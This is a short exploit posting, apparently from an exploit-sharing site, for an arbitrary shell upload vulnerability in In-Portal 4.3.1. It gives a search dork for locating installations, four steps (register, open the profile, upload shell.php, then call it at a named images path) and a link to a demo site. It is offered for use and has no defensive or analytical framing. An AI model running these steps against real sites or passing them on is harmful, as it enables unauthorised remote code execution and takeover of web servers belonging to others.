Exploit for unknown platform in category web applications
====================================================
In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability
====================================================
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :In-Portal v 4.3.1 Shell Upload Vulnerability
[+] D0rk : Powered by In-portal ® 1997-2009
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
step1: register in site
http://www.xxx.com/path/platform/login/register.html
step2: go to your profile
http://www.xxx.com/path/platform/my_account/my_profile.html
step3: upload shell.php
step4: get shell
http://www.xxx.com/path/kernel/images/shell.php
Demo:
-----
http://www.in-portal.net/demo
-----
# 0day.today [2018-01-06] #